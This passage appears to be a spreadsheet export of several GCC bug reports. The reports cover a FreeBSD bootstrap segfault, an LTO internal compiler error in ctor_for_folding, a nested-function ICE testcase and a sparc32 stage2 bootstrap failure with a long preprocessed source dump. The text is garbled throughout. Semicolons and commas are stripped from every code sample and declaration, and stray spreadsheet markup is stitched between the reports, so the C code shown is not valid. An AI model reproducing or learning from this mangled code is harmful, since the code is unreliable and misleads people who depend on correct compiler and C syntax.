CFLAGS= -O2 -pipe -march=i586 -mcpu=i686
host: i686-pc-freebsd4
build: i686-pc-freebsd4
target: i686-pc-freebsd4
How-To-Repeat:
CVS-date: Tue Oct 17 10:18 MEST 2000 (problem exists at least since Oct 13)
mkdir -p obj/freebsd4
../../configure --verbose --host=i686-pc-freebsd4 --with-gnu-as --with-gnu-ld --disable-shared --prefix=/usr/vol/opt/freebsd4/gcc-20001017
make bootstrap
end of build log:
####
ar rc libcpp.a cpplib.o cpplex.o cppmacro.o cppexp.o cppfiles.o cpphash.o
cpperror.o cppinit.o cppdefault.o cppoutput.o mkdeps.o prefix.o version.o
mbchar.o 
if [ -f ranlib ] || [ -f /usr/bin/ranlib -o -f /bin/ranlib ]  then
ranlib libcpp.a  else true  fi
stage1/xgcc -Bstage1/
-B/usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/bin/  -DIN_GCC
-O2 -O2 -pipe -march=i586 -mcpu=i686  -W -Wall -Wtraditional
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic
-Wno-long-long  -DHAVE_CONFIG_H  -o cpp0 cppmain.o \
intl.o libcpp.a obstack.o   ./intl/libintl.a     ../libiberty/libiberty.a
./xgcc -B./ -B/usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/bin/
-isystem /usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/include
-dumpspecs &gt; tmp-specs
mv tmp-specs specs
echo int xxy_us_dummy &gt;tmp-dum.c
./xgcc -B./ -B/usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/bin/
-isystem /usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/include -S
tmp-dum.c
cc1: Internal error: Segmentation fault.
   Please submit a full bug report.
   See  for instructions.
make[2]: *** [s-under] Error 1
####
output of
./xgcc -B./ -B/usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/bin/ -v :
####
Reading specs from ./specs
Configured with:  --verbose --host=i686-pc-freebsd4 --with-gnu-as
--with-gnu-ld --disable-shared
--prefix=/usr/vol/opt/freebsd4/gcc-20001017
gcc version 2.97 20001017 (experimental)
####
tmp-dum.c:
####
int xxy_us_dummy
####
output of
 ./xgcc -B./ -B/usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/bin/
-v -isystem /usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/include
-save-temps -S tmp-dum.c :
####
Reading specs from ./specs
Configured with:  --verbose --host=i686-pc-freebsd4 --with-gnu-as
--with-gnu-ld --disable-shared
--prefix=/usr/vol/opt/freebsd4/gcc-20001017
gcc version 2.97 20001017 (experimental)
 ./cpp0 -lang-c -v -iprefix ./../lib/gcc-lib/i686-pc-freebsd4/2.97/
-isystem ./include -isystem
/usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/bin/include
-D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -Dunix -D__ELF__
-D__FreeBSD__ -D__unix__ -D__ELF__ -D__FreeBSD__ -D__unix -Asystem(unix)
-Asystem(bsd) -Asystem(FreeBSD) -D__STDC_HOSTED__=1 -Acpu(i386)
-Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i686__
-D__tune_pentiumpro__ -isystem
/usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/include tmp-dum.c
tmp-dum.i
GNU CPP version 2.97 20001017 (experimental) (cpplib) (i386 FreeBSD/ELF)
ignoring nonexistent directory
/usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/bin/include
ignoring nonexistent directory
/usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/include
ignoring nonexistent directory
../lib/gcc-lib/i686-pc-freebsd4/2.97/include
ignoring nonexistent directory ../i686-pc-freebsd4/include
ignoring nonexistent directory
/usr/vol/opt/freebsd4/gcc-20001017/lib/gcc-lib/i686-pc-freebsd4/2.97/include
ignoring nonexistent directory
/usr/vol/opt/freebsd4/gcc-20001017/i686-pc-freebsd4/include
#include ... search starts here:
#include  search starts here:
 include
 /usr/local/include
 /usr/include
End of search list.
 ./cc1 tmp-dum.i -quiet -dumpbase tmp-dum.c -version -o tmp-dum.s
GNU C version 2.97 20001017 (experimental) (i686-pc-freebsd4) compiled by
GNU C version 2.97 20001017 (experimental).
cc1: Internal error: Segmentation fault.
   Please submit a full bug report.
   See  for instructions.
####
tmp-dum.i:
####
# 1 tmp-dum.c
int xxy_us_dummy
####</t>
  </si>
  <si>
    <t>GCC-60820</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] ice in ctor_for_folding at varpool.c:291</t>
  </si>
  <si>
    <t>I test gcc 4.9 on my x86_64 gentoo machine and ICE is encountered in 'net-misc/nx' package:
lto1: internal compiler error: in ctor_for_folding at varpool.c:305
0xb4b0b6 ctor_for_folding(tree_node*)
	../../gcc/varpool.c:292
0xb4b448 dump_varpool_node(_IO_FILE* varpool_node*)
	../../gcc/varpool.c:211
0x5bba6a dump_symtab(_IO_FILE*)
	../../gcc/symtab.c:707
0x546084 do_whole_program_analysis
	../../gcc/lto/lto.c:3248
0x546084 lto_main()
	../../gcc/lto/lto.c:3422
decl:
 &lt;var_decl 0x7f574898be40 in6addr_any
    type &lt;record_type 0x7f57488e4690 in6_addr readonly TI
        size 
        unit size 
        align 32 symtab 0 alias set 0 canonical type 0x7f57488e4dc8
        fields 
            TI file /usr/include/netinet/in.h line 206 col 9 size  unit size 
            align 32 offset_align 128
            offset 
            bit offset  context &gt; context 
        pointer_to_this &gt;
    readonly public static weak TI file /usr/include/netinet/in.h line 214 col 30 size  unit size 
    align 32 context  attributes  initial &gt;
DECL_INITIAL(decl):
 &lt;constructor 0x7f5748974798
    type &lt;record_type 0x7f57488e4690 in6_addr readonly TI
        size 
        unit size 
        align 32 symtab 0 alias set 0 canonical type 0x7f57488e4dc8
        fields 
            TI file /usr/include/netinet/in.h line 206 col 9 size  unit size 
            align 32 offset_align 128
            offset 
            bit offset  context &gt; context 
        pointer_to_this &gt;
    constant static lngt 1 idx 
    val &lt;constructor 0x7f5748974768
        type  unit size 
            align 32 symtab 0 alias set 0 canonical type 0x7f57488e4d20 fields  context 
            chain &gt;
        constant static lngt 1
        idx 
            TI file /usr/include/netinet/in.h line 201 col 10 size  unit size 
            align 8 offset_align 128 offset  bit offset  context  chain &gt;
        val 
            constant static lngt 16 idx 
            val 
            idx  val 
            idx  val 
            idx  val 
            idx  val 
            idx  val 
            idx  val 
            idx  val 
            idx  val 
            idx  val 
            idx  val 
            idx  val 
            idx  val 
            idx  val 
            idx  val 
            idx  val &gt;&gt;&gt;
tail -n7 nxagent.wpa.000i.cgraph:
in6addr_any/8509 (in6addr_any) @0x7f574517de38
  Type: variable definition analyzed alias
  Visibility: externally_visible prevailing_def public weak
  References: local_in6addr_any/8508 (alias)
  Referring: _XSERVTransSocketINETCreateListener/8525 (read)_FontTransSocketINETCreateListener/63329 (read)
  Read from file: os/libos.a
  Availability: available
  Varpool flags: initialized read-only
cgraph dump: https://drive.google.com/file/d/0B0pisUJ80pO1YjVsOU15eWJ5c1k/edit?usp=sharing
source code snippet:
/*
 * This provides compatibility for apps linked against system libraries
 * that don't have IPv6 support.
 */
#if defined(IPv6) &amp;&amp; defined(AF_INET6)
static const struct in6_addr local_in6addr_any = IN6ADDR_ANY_INIT
#pragma weak in6addr_any = local_in6addr_any
#ifndef __USLC__
#pragma weak getaddrinfo
#endif
static int haveIPv6 = 1
#endif</t>
  </si>
  <si>
    <t>GCC-18963</t>
  </si>
  <si>
    <t>[4.0 Regression] static and nested declarations cause an ice</t>
  </si>
  <si>
    <t>The following testcase ices with mainline.
static int barf ()
int foo () {
  int j = 4
  auto int barf ()
  int barf () {
    return j
  }
  return barf ()
}
static int barf () {
  return 3
}
 What should the result be anyway?</t>
  </si>
  <si>
    <t>GCC-7802</t>
  </si>
  <si>
    <t>stage2 bootstrap of gcc-3-3 (20020901) failure on sparc32-linux</t>
  </si>
  <si>
    <t xml:space="preserve">	Reading specs from stage1/specs
Configured with: ../gcc/configure 
Thread model: posix
gcc version 3.3 20020901 (experimental)
 stage1/cc1 -E -quiet -v -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/config -I../../gcc/gcc/../include -iprefix stage1/../lib/gcc-lib/sparc-unknown-linux-gnu/3.3/ -isystem include -isystem stage1/include -isystem /usr/local/sparc-unknown-linux-gnu/bin/include -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -D__sparc__ -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__sparc__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=unix -Asystem=posix -D__GCC_NEW_VARARGS__ -Acpu=sparc -Amachine=sparc -DIN_GCC -DHAVE_CONFIG_H ../../gcc/gcc/cppfiles.c -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long -fno-common -O2 cppfiles.i
ignoring nonexistent directory stage1/include
ignoring nonexistent directory /usr/local/sparc-unknown-linux-gnu/bin/include
ignoring nonexistent directory lib/gcc-lib/sparc-unknown-linux-gnu/3.3/includeignoring nonexistent directory lib/gcc-lib/sparc-unknown-linux-gnu/3.3/../../../../sparc-unknown-linux-gnu/include
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/lib/gcc-lib/sparc-unknown-linux-gnu/3.3/include
ignoring nonexistent directory /usr/local/sparc-unknown-linux-gnu/include
ignoring duplicate directory .
ignoring duplicate directory ../../gcc/gcc
#include ... search starts here:
#include  search starts here:
 .
 ../../gcc/gcc
 ../../gcc/gcc/config
 ../../gcc/include
 include
 /usr/local/include
 /usr/include
End of search list.
../../gcc/gcc/cppfiles.c:1415:30: warning: null character(s) ignored
cc1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Here's the preprocessed file cppfiles.i:
# 1 ../../gcc/gcc/cppfiles.c
# 1 
# 1 
# 1 ../../gcc/gcc/cppfiles.c
# 23 ../../gcc/gcc/cppfiles.c
# 1 config.h 1
# 1 auto-host.h 1
# 3 config.h 2
struct rtx_def
typedef struct rtx_def *rtx
struct rtvec_def
typedef struct rtvec_def *rtvec
union tree_node
typedef union tree_node *tree
# 1 ../../gcc/include/ansidecl.h 1
# 18 config.h 2
# 1 ../../gcc/gcc/config/sparc/sparc.h 1
# 82 ../../gcc/gcc/config/sparc/sparc.h
enum cmodel {
  CM_32
  CM_MEDLOW
  CM_MEDMID
  CM_MEDANY
  CM_EMBMEDANY
}
extern const char *sparc_cmodel_string
extern enum cmodel sparc_cmodel
# 382 ../../gcc/gcc/config/sparc/sparc.h
extern int target_flags
# 606 ../../gcc/gcc/config/sparc/sparc.h
enum processor_type {
  PROCESSOR_V7
  PROCESSOR_CYPRESS
  PROCESSOR_V8
  PROCESSOR_SUPERSPARC
  PROCESSOR_SPARCLITE
  PROCESSOR_F930
  PROCESSOR_F934
  PROCESSOR_HYPERSPARC
  PROCESSOR_SPARCLITE86X
  PROCESSOR_SPARCLET
  PROCESSOR_TSC701
  PROCESSOR_V9
  PROCESSOR_ULTRASPARC
  PROCESSOR_ULTRASPARC3
}
extern enum processor_type sparc_cpu
# 645 ../../gcc/gcc/config/sparc/sparc.h
struct sparc_cpu_select
{
  const char *string
  const char *const name
  const int set_tune_p
  const int set_arch_p
}
extern struct sparc_cpu_select sparc_select[]
# 1028 ../../gcc/gcc/config/sparc/sparc.h
extern const int *hard_regno_mode_classes
extern int sparc_mode_class[]
# 1208 ../../gcc/gcc/config/sparc/sparc.h
enum reg_class { NO_REGS FPCC_REGS I64_REGS GENERAL_REGS FP_REGS
                 EXTRA_FP_REGS GENERAL_OR_FP_REGS GENERAL_OR_EXTRA_FP_REGS
                 ALL_REGS LIM_REG_CLASSES }
# 1241 ../../gcc/gcc/config/sparc/sparc.h
extern enum reg_class sparc_regno_reg_class[102]
# 1324 ../../gcc/gcc/config/sparc/sparc.h
extern char sparc_leaf_regs[]
extern char leaf_reg_remap[]
# 1724 ../../gcc/gcc/config/sparc/sparc.h
struct sparc_args {
  int words
  int prototype_p
  int libcall_p
}
# 1813 ../../gcc/gcc/config/sparc/sparc.h
extern rtx sparc_compare_op0
extern rtx sparc_compare_op1
# 1842 ../../gcc/gcc/config/sparc/sparc.h
extern char sparc_hard_reg_printed[8]
# 19 config.h 2
# 1 ../../gcc/gcc/config/dbxelf.h 1
# 20 config.h 2
# 1 ../../gcc/gcc/config/elfos.h 1
# 21 config.h 2
# 1 ../../gcc/gcc/config/svr4.h 1
# 22 config.h 2
# 1 ../../gcc/gcc/config/sparc/sysv4.h 1
# 23 config.h 2
# 1 ../../gcc/gcc/config/sparc/linux.h 1
# 24 config.h 2
# 1 ../../gcc/gcc/defaults.h 1
# 25 config.h 2
# 1 insn-constants.h 1
# 31 config.h 2
# 1 insn-flags.h 1
# 210 insn-flags.h
extern rtx gen_get_pc (rtx rtx rtx)
extern rtx gen_movsi_lo_sum_pic (rtx rtx rtx)
extern rtx gen_movsi_high_pic (rtx rtx)
static __inline__ rtx gen_movdi_lo_sum_pic (rtx rtx rtx)
static __inline__ rtx
gen_movdi_lo_sum_pic(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_movdi_high_pic (rtx rtx)
static __inline__ rtx
gen_movdi_high_pic(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_seth44 (rtx rtx)
extern rtx gen_setm44 (rtx rtx rtx)
extern rtx gen_setl44 (rtx rtx rtx)
extern rtx gen_sethh (rtx rtx)
extern rtx gen_setlm (rtx rtx)
extern rtx gen_sethm (rtx rtx rtx)
extern rtx gen_setlo (rtx rtx rtx)
extern rtx gen_embmedany_sethi (rtx rtx)
extern rtx gen_embmedany_losum (rtx rtx rtx)
extern rtx gen_embmedany_brsum (rtx rtx)
extern rtx gen_embmedany_textuhi (rtx rtx)
extern rtx gen_embmedany_texthi (rtx rtx)
extern rtx gen_embmedany_textulo (rtx rtx rtx)
extern rtx gen_embmedany_textlo (rtx rtx rtx)
extern rtx gen_movdf_cc_sp64 (rtx rtx rtx rtx rtx)
static __inline__ rtx gen_movdf_cc_reg_sp64 (rtx rtx rtx rtx rtx)
static __inline__ rtx
gen_movdf_cc_reg_sp64(a b c d e)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
     rtx d __attribute__ ((__unused__))
     rtx e __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_extendsfdf2 (rtx rtx)
extern rtx gen_truncdfsf2 (rtx rtx)
extern rtx gen_floatsisf2 (rtx rtx)
extern rtx gen_floatsidf2 (rtx rtx)
extern rtx gen_floatdisf2 (rtx rtx)
extern rtx gen_floatdidf2 (rtx rtx)
extern rtx gen_fix_truncsfsi2 (rtx rtx)
extern rtx gen_fix_truncdfsi2 (rtx rtx)
extern rtx gen_fix_truncsfdi2 (rtx rtx)
extern rtx gen_fix_truncdfdi2 (rtx rtx)
extern rtx gen_adddi3_insn_sp32 (rtx rtx rtx)
extern rtx gen_addx (rtx rtx rtx)
extern rtx gen_subx (rtx rtx rtx)
extern rtx gen_cmp_minus_cc_set (rtx rtx rtx)
extern rtx gen_mulsi3 (rtx rtx rtx)
extern rtx gen_muldi3_v8plus (rtx rtx rtx)
extern rtx gen_mulsidi3_v8plus (rtx rtx rtx)
extern rtx gen_const_mulsidi3_v8plus (rtx rtx rtx)
extern rtx gen_const_mulsidi3_sp32 (rtx rtx rtx)
static __inline__ rtx gen_const_mulsidi3_sp64 (rtx rtx rtx)
static __inline__ rtx
gen_const_mulsidi3_sp64(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_smulsi3_highpart_v8plus (rtx rtx rtx rtx)
extern rtx gen_const_smulsi3_highpart_v8plus (rtx rtx rtx rtx)
extern rtx gen_const_smulsi3_highpart (rtx rtx rtx)
extern rtx gen_umulsidi3_v8plus (rtx rtx rtx)
extern rtx gen_const_umulsidi3_sp32 (rtx rtx rtx)
static __inline__ rtx gen_const_umulsidi3_sp64 (rtx rtx rtx)
static __inline__ rtx
gen_const_umulsidi3_sp64(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_const_umulsidi3_v8plus (rtx rtx rtx)
extern rtx gen_umulsi3_highpart_v8plus (rtx rtx rtx rtx)
extern rtx gen_const_umulsi3_highpart_v8plus (rtx rtx rtx rtx)
extern rtx gen_const_umulsi3_highpart (rtx rtx rtx)
extern rtx gen_divsi3_sp32 (rtx rtx rtx)
static __inline__ rtx gen_divsi3_sp64 (rtx rtx rtx rtx)
static __inline__ rtx
gen_divsi3_sp64(a b c d)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
     rtx d __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_divdi3 (rtx rtx rtx)
static __inline__ rtx
gen_divdi3(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_udivsi3_sp32 (rtx rtx rtx)
static __inline__ rtx gen_udivsi3_sp64 (rtx rtx rtx)
static __inline__ rtx
gen_udivsi3_sp64(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_udivdi3 (rtx rtx rtx)
static __inline__ rtx
gen_udivdi3(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_andsi3 (rtx rtx rtx)
extern rtx gen_iorsi3 (rtx rtx rtx)
extern rtx gen_xorsi3 (rtx rtx rtx)
extern rtx gen_negsi2 (rtx rtx)
extern rtx gen_one_cmplsi2 (rtx rtx)
extern rtx gen_adddf3 (rtx rtx rtx)
extern rtx gen_addsf3 (rtx rtx rtx)
extern rtx gen_subdf3 (rtx rtx rtx)
extern rtx gen_subsf3 (rtx rtx rtx)
extern rtx gen_muldf3 (rtx rtx rtx)
extern rtx gen_mulsf3 (rtx rtx rtx)
extern rtx gen_divdf3 (rtx rtx rtx)
extern rtx gen_divsf3 (rtx rtx rtx)
extern rtx gen_negsf2 (rtx rtx)
extern rtx gen_abssf2 (rtx rtx)
extern rtx gen_sqrtdf2 (rtx rtx)
extern rtx gen_sqrtsf2 (rtx rtx)
extern rtx gen_ashlsi3 (rtx rtx rtx)
extern rtx gen_ashldi3_v8plus (rtx rtx rtx)
extern rtx gen_ashrsi3 (rtx rtx rtx)
extern rtx gen_ashrdi3_v8plus (rtx rtx rtx)
extern rtx gen_lshrsi3 (rtx rtx rtx)
extern rtx gen_lshrdi3_v8plus (rtx rtx rtx)
extern rtx gen_jump (rtx)
extern rtx gen_blockage (void)
extern rtx gen_update_return (rtx rtx)
extern rtx gen_nop (void)
extern rtx gen_flush_register_windows (void)
extern rtx gen_goto_handler_and_restore (rtx)
extern rtx gen_do_builtin_setjmp_setup (void)
extern rtx gen_flush (rtx)
extern rtx gen_flushdi (rtx)
extern rtx gen_ffssi2 (rtx rtx)
extern rtx gen_prefetch_64 (rtx rtx rtx)
extern rtx gen_prefetch_32 (rtx rtx rtx)
extern rtx gen_trap (void)
extern rtx gen_cmpsi (rtx rtx)
static __inline__ rtx gen_cmpdi (rtx rtx)
static __inline__ rtx
gen_cmpdi(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_cmpsf (rtx rtx)
extern rtx gen_cmpdf (rtx rtx)
extern rtx gen_cmptf (rtx rtx)
extern rtx gen_seqsi_special (rtx rtx rtx)
static __inline__ rtx gen_seqdi_special (rtx rtx rtx)
static __inline__ rtx
gen_seqdi_special(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_snesi_special (rtx rtx rtx)
static __inline__ rtx gen_snedi_special (rtx rtx rtx)
static __inline__ rtx
gen_snedi_special(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_seqdi_special_trunc (rtx rtx rtx)
static __inline__ rtx
gen_seqdi_special_trunc(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_snedi_special_trunc (rtx rtx rtx)
static __inline__ rtx
gen_snedi_special_trunc(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_seqsi_special_extend (rtx rtx rtx)
static __inline__ rtx
gen_seqsi_special_extend(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_snesi_special_extend (rtx rtx rtx)
static __inline__ rtx
gen_snesi_special_extend(a b c)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_seq (rtx)
extern rtx gen_sne (rtx)
extern rtx gen_sgt (rtx)
extern rtx gen_slt (rtx)
extern rtx gen_sge (rtx)
extern rtx gen_sle (rtx)
extern rtx gen_sgtu (rtx)
extern rtx gen_sltu (rtx)
extern rtx gen_sgeu (rtx)
extern rtx gen_sleu (rtx)
extern rtx gen_beq (rtx)
extern rtx gen_bne (rtx)
extern rtx gen_bgt (rtx)
extern rtx gen_bgtu (rtx)
extern rtx gen_blt (rtx)
extern rtx gen_bltu (rtx)
extern rtx gen_bge (rtx)
extern rtx gen_bgeu (rtx)
extern rtx gen_ble (rtx)
extern rtx gen_bleu (rtx)
extern rtx gen_bunordered (rtx)
extern rtx gen_bordered (rtx)
extern rtx gen_bungt (rtx)
extern rtx gen_bunlt (rtx)
extern rtx gen_buneq (rtx)
extern rtx gen_bunge (rtx)
extern rtx gen_bunle (rtx)
extern rtx gen_bltgt (rtx)
extern rtx gen_movqi (rtx rtx)
extern rtx gen_movhi (rtx rtx)
extern rtx gen_movsi (rtx rtx)
extern rtx gen_movsi_pic_label_ref (rtx rtx)
extern rtx gen_movdi (rtx rtx)
static __inline__ rtx gen_movdi_pic_label_ref (rtx rtx)
static __inline__ rtx
gen_movdi_pic_label_ref(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_reload_indi (rtx rtx rtx)
extern rtx gen_reload_outdi (rtx rtx rtx)
extern rtx gen_movsf (rtx rtx)
extern rtx gen_movdf (rtx rtx)
extern rtx gen_movtf (rtx rtx)
extern rtx gen_movqicc (rtx rtx rtx rtx)
extern rtx gen_movhicc (rtx rtx rtx rtx)
extern rtx gen_movsicc (rtx rtx rtx rtx)
static __inline__ rtx gen_movdicc (rtx rtx rtx rtx)
static __inline__ rtx
gen_movdicc(a b c d)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
     rtx c __attribute__ ((__unused__))
     rtx d __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_movsfcc (rtx rtx rtx rtx)
extern rtx gen_movdfcc (rtx rtx rtx rtx)
extern rtx gen_movtfcc (rtx rtx rtx rtx)
extern rtx gen_zero_extendhisi2 (rtx rtx)
extern rtx gen_zero_extendqihi2 (rtx rtx)
extern rtx gen_zero_extendqisi2 (rtx rtx)
static __inline__ rtx gen_zero_extendqidi2 (rtx rtx)
static __inline__ rtx
gen_zero_extendqidi2(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_zero_extendhidi2 (rtx rtx)
static __inline__ rtx
gen_zero_extendhidi2(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_zero_extendsidi2 (rtx rtx)
extern rtx gen_extendhisi2 (rtx rtx)
extern rtx gen_extendqihi2 (rtx rtx)
extern rtx gen_extendqisi2 (rtx rtx)
static __inline__ rtx gen_extendqidi2 (rtx rtx)
static __inline__ rtx
gen_extendqidi2(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_extendhidi2 (rtx rtx)
static __inline__ rtx
gen_extendhidi2(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_extendsidi2 (rtx rtx)
static __inline__ rtx
gen_extendsidi2(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_extendsftf2 (rtx rtx)
extern rtx gen_extenddftf2 (rtx rtx)
extern rtx gen_trunctfsf2 (rtx rtx)
extern rtx gen_trunctfdf2 (rtx rtx)
extern rtx gen_floatsitf2 (rtx rtx)
static __inline__ rtx gen_floatunssitf2 (rtx rtx)
static __inline__ rtx
gen_floatunssitf2(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_floatunsdisf2 (rtx rtx)
static __inline__ rtx
gen_floatunsdisf2(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
static __inline__ rtx gen_floatunsdidf2 (rtx rtx)
static __inline__ rtx
gen_floatunsdidf2(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_floatditf2 (rtx rtx)
static __inline__ rtx gen_floatunsditf2 (rtx rtx)
static __inline__ rtx
gen_floatunsditf2(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_fix_trunctfsi2 (rtx rtx)
static __inline__ rtx gen_fixuns_trunctfsi2 (rtx rtx)
static __inline__ rtx
gen_fixuns_trunctfsi2(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_fix_trunctfdi2 (rtx rtx)
static __inline__ rtx gen_fixuns_trunctfdi2 (rtx rtx)
static __inline__ rtx
gen_fixuns_trunctfdi2(a b)
     rtx a __attribute__ ((__unused__))
     rtx b __attribute__ ((__unused__))
{
  return 0
}
extern rtx gen_adddi3 (rtx rtx rtx)
extern rtx gen_addsi3 (rtx rtx rtx)
extern rtx gen_subdi3 (rtx rtx rtx)
extern rtx gen_subsi3 (rtx rtx rtx)
extern rtx gen_muldi3 (rtx rtx rtx)
extern rtx gen_mulsidi3 (rtx rtx rtx)
extern rtx gen_smulsi3_highpart (rtx rtx rtx)
extern rtx gen_umulsidi3 (rtx rtx rtx)
extern rtx gen_umulsi3_highpart (rtx rtx rtx)
extern rtx gen_divsi3 (rtx rtx rtx)
extern rtx gen_udivsi3 (rtx rtx rtx)
extern rtx gen_anddi3 (rtx rtx rtx)
extern rtx gen_iordi3 (rtx rtx rtx)
extern rtx gen_xordi3 (rtx rtx rtx)
extern rtx gen_negdi2 (rtx rtx)
extern rtx gen_one_cmpldi2 (rtx rtx)
extern rtx gen_addtf3 (rtx rtx rtx)
extern rtx gen_subtf3 (rtx rtx rtx)
extern rtx gen_multf3 (rtx rtx rtx)
extern rtx gen_divtf3 (rtx rtx rtx)
extern rtx gen_negtf2 (rtx rtx)
extern rtx gen_negdf2 (rtx rtx)
extern rtx gen_abstf2 (rtx rtx)
extern rtx gen_absdf2 (rtx rtx)
extern rtx gen_sqrttf2 (rtx rtx)
extern rtx gen_ashldi3 (rtx rtx rtx)
extern rtx gen_ashrdi3 (rtx rtx rtx)
extern rtx gen_lshrdi3 (rtx rtx rtx)
extern rtx gen_tablejump (rtx rtx)
extern rtx gen_call (rtx rtx rtx rtx)
extern rtx gen_call_value (rtx rtx rtx rtx rtx)
extern rtx gen_untyped_call (rtx rtx rtx)
extern rtx gen_sibcall (rtx)
extern rtx gen_sibcall_value (rtx rtx)
extern rtx gen_sibcall_epilogue (void)
extern rtx gen_untyped_return (rtx rtx)
extern rtx gen_indirect_jump (rtx)
extern rtx gen_nonlocal_goto (rtx rtx rtx rtx)
extern rtx gen_builtin_setjmp_setup (rtx)
extern rtx gen_setjmp (void)
extern rtx gen_setjmp_32 (void)
extern rtx gen_setjmp_64 (void)
extern rtx gen_prefetch (rtx rtx rtx)
extern rtx gen_prologue (void)
extern rtx gen_exception_receiver (void)
extern rtx gen_builtin_setjmp_receiver (rtx)
extern rtx gen_conditional_trap (rtx rtx)
# 32 config.h 2
# 24 ../../gcc/gcc/cppfiles.c 2
# 1 ../../gcc/gcc/system.h 1
# 33 ../../gcc/gcc/system.h
# 1 include/stdarg.h 1 3 4
# 43 include/stdarg.h 3 4
typedef __builtin_va_list __gnuc_va_list
# 105 include/stdarg.h 3 4
typedef __gnuc_va_list va_list
# 34 ../../gcc/gcc/system.h 2
# 47 ../../gcc/gcc/system.h
# 1 include/stddef.h 1 3 4
# 147 include/stddef.h 3 4
typedef int ptrdiff_t
# 203 include/stddef.h 3 4
typedef unsigned int size_t
# 299 include/stddef.h 3 4
typedef int wchar_t
